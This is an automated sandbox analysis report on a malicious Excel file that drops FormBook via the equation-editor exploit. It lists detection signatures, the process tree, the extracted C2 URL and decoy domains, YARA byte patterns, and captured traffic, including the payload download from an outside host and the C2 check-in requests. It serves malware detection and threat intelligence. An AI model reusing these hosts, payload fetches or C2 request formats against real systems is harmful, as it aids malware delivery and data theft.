Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Payment.xlsx

Overview

General Information

Sample Name:Payment.xlsx
Analysis ID:404048
MD5:05f49aa5b342dedd1d7b6673f3d8bc41
SHA1:9ca061b9851269f8b1d2fd990ebe119903a5f0fb
SHA256:3a6cc669542f5e3f9a801e9344b182c71e72396e27afbeac14eeb3d3be0b9498
Tags:FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains executable resources (Code or Archives)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2396 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2584 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2872 cmdline: 'C:\Users\Public\vbc.exe' MD5: 5551346AA9F251895021B95A2A7CC390)
      • vbc.exe (PID: 2976 cmdline: C:\Users\Public\vbc.exe MD5: 5551346AA9F251895021B95A2A7CC390)
      • vbc.exe (PID: 2460 cmdline: C:\Users\Public\vbc.exe MD5: 5551346AA9F251895021B95A2A7CC390)
      • vbc.exe (PID: 2276 cmdline: C:\Users\Public\vbc.exe MD5: 5551346AA9F251895021B95A2A7CC390)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • NAPSTAT.EXE (PID: 1960 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
          • cmd.exe (PID: 268 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cats16.com/8u3b/"], "decoy": ["pipienta.com", "wisdomfest.net", "jenniferreich.com", "bigcanoehomesforless.com", "kayandbernard.com", "offerbuildingsecrets.com", "benleefoto.com", "contactlesssoftware.tech", "statenislandplumbing.info", "lifestylemedicineservices.com", "blazerplanning.com", "fnatic-skins.club", "effectivemarketinginc.com", "babyshopit.com", "2000deal.com", "k12paymentcemter.com", "spwakd.com", "lesreponses.com", "abundando.com", "hawkspremierfhc.com", "midwestmadeclothing.com", "kamuakuinisiapa.com", "swirlingheadjewelry.com", "donelys.com", "stiloksero.com", "hoangphucsolar.com", "gb-contracting.com", "girlboyfriends.com", "decadejam.com", "glassfullcoffee.com", "todoparaconstruccion.com", "anygivenrunday.com", "newgalaxyindia.com", "dahlonegaforless.com", "blue-light.tech", "web-evo.com", "armmotive.com", "mollysmulligan.com", "penislandbrewer.com", "wgrimao.com", "dxm-int.net", "sarmaayagroup.com", "timbraunmusician.com", "amazoncovid19tracer.com", "peaknband.com", "pyqxlz.com", "palomachurch.com", "surfboardwarehouse.net", "burundiacademyst.com", "pltcoin.com", "workinglifestyle.com", "vickybowskill.com", "ottawahomevalues.info", "jtrainterrain.com", "francescoiocca.com", "metallitypiercing.com", "lashsavings.com", "discjockeydelraybeach.com", "indicraftsvilla.com", "tbq.xyz", "arfjkacsgatfzbazpdth.com", "appsend.online", "cunerier.com", "orospucocuguatmaca.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        7.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.vbc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.122.177, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2584, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2584, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2584, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2872
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2584, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2872

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cats16.com/8u3b/"], "decoy": ["pipienta.com", "wisdomfest.net", "jenniferreich.com", "bigcanoehomesforless.com", "kayandbernard.com", "offerbuildingsecrets.com", "benleefoto.com", "contactlesssoftware.tech", "statenislandplumbing.info", "lifestylemedicineservices.com", "blazerplanning.com", "fnatic-skins.club", "effectivemarketinginc.com", "babyshopit.com", "2000deal.com", "k12paymentcemter.com", "spwakd.com", "lesreponses.com", "abundando.com", "hawkspremierfhc.com", "midwestmadeclothing.com", "kamuakuinisiapa.com", "swirlingheadjewelry.com", "donelys.com", "stiloksero.com", "hoangphucsolar.com", "gb-contracting.com", "girlboyfriends.com", "decadejam.com", "glassfullcoffee.com", "todoparaconstruccion.com", "anygivenrunday.com", "newgalaxyindia.com", "dahlonegaforless.com", "blue-light.tech", "web-evo.com", "armmotive.com", "mollysmulligan.com", "penislandbrewer.com", "wgrimao.com", "dxm-int.net", "sarmaayagroup.com", "timbraunmusician.com", "amazoncovid19tracer.com", "peaknband.com", "pyqxlz.com", "palomachurch.com", "surfboardwarehouse.net", "burundiacademyst.com", "pltcoin.com", "workinglifestyle.com", "vickybowskill.com", "ottawahomevalues.info", "jtrainterrain.com", "francescoiocca.com", "metallitypiercing.com", "lashsavings.com", "discjockeydelraybeach.com", "indicraftsvilla.com", "tbq.xyz", "arfjkacsgatfzbazpdth.com", "appsend.online", "cunerier.com", "orospucocuguatmaca.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exeReversingLabs: Detection: 12%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 12%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Payment.xlsxVirustotal: Detection: 18%Perma Link
          Source: Payment.xlsxReversingLabs: Detection: 10%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exeJoe Sandbox ML: detected
          Source: 7.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
          Source: Binary string: napstat.pdb source: vbc.exe, 00000007.00000003.2227630571.00000000007DE000.00000004.00000001.sdmp
          Source: excel.exeMemory has grown: Private usage: 4MB later: 68MB
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 4x nop then pop esi
          Source: global trafficDNS query: name: will.kasraz.com
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.122.177:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.122.177:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 3132 WEB-CLIENT PNG large image width download attempt 192.3.122.177:80 -> 192.168.2.22:49167
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 66.235.200.147:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 66.235.200.147:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 66.235.200.147:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.cats16.com/8u3b/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 May 2021 14:58:50 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3Last-Modified: Tue, 04 May 2021 10:00:54 GMTETag: "a2800-5c17e27600d6b"Accept-Ranges: bytesContent-Length: 665600Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 56 1b 91 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 1e 0a 00 00 08 00 00 00 00 00 00 26 3d 0a 00 00 20 00 00 00 40 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 3c 0a 00 4f 00 00 00 00 40 0a 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2c 1d 0a 00 00 20 00 00 00 1e 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 04 00 00 00 40 0a 00 00 06 00 00 00 20 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 3d 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 2c 6e 01 00 b8 6d 01 00 03 00 00 00 01 00 00 06 e4 db 02 00 f0 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 17 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 93 03 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a 0a
          Source: global trafficHTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg== HTTP/1.1Host: www.donelys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?hR-pi0=s5u5WNMtaTRlz52z/4dgKpDJSj+CyHwo8kTb9wzTosdJqxcIJBsW60lsAC1MLSgGQxuvcQ==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.discjockeydelraybeach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A== HTTP/1.1Host: www.arfjkacsgatfzbazpdth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.girlboyfriends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg== HTTP/1.1Host: www.burundiacademyst.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.pipienta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.54.117.210 198.54.117.210
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
          Source: global trafficHTTP traffic detected: GET /a/so.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: will.kasraz.comConnection: Keep-Alive
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F90404A.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /a/so.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: will.kasraz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg== HTTP/1.1Host: www.donelys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?hR-pi0=s5u5WNMtaTRlz52z/4dgKpDJSj+CyHwo8kTb9wzTosdJqxcIJBsW60lsAC1MLSgGQxuvcQ==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.discjockeydelraybeach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A== HTTP/1.1Host: www.arfjkacsgatfzbazpdth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.girlboyfriends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg== HTTP/1.1Host: www.burundiacademyst.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
